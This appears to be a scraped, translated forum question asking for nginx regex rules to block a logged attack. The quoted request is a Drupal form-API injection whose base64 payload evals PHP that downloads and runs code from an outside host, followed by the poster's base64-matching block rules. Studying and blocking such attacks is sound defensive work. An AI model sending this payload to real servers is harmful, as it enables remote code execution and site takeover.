eval base64病毒-nginx regex预防
这是一种常见的病毒,通过post URI攻击,如:eval base64病毒-nginx regex预防,regex,security,nginx,virus,Regex,Security,Nginx,Virus,这是一种常见的病毒,通过post URI攻击,如: /?q=user/password&name%5B%23post_render%5D%5B0%5D=array_map&name%5B%23suffix%5D=eval%28base64_decode%28%22ZXZhbChmaWxlX2dldF9jb250ZW50cygiaHR0cDovL2Zvcm1hbi1kZXNpZ24uY29tL3BsdWdpbnMvZ2RfZm9udHMvaW5kb3hlLnR4dCIpICk7%2
/?q=user/password&name%5B%23post_render%5D%5B0%5D=array_map&name%5B%23suffix%5D=eval%28base64_decode%28%22ZXZhbChmaWxlX2dldF9jb250ZW50cygiaHR0cDovL2Zvcm1hbi1kZXNpZ24uY29tL3BsdWdpbnMvZ2RfZm9udHMvaW5kb3hlLnR4dCIpICk7%22%29%29%3B%2F%2F&name%5B%23markup%5D=assert&name%5B%23type%5D=markup HTTP/1.1" 200 21803 "https://example.com/
如何防止它通过nginx
我试过了
location ~* base64 {
return 404;
}
放下任何包含base64但不起作用的请求。请帮助并给我正确的nginx正则表达式规则。(我无法修改应用程序代码库或更新系统)
if ($query_string ~ "base64") {
return 404;
}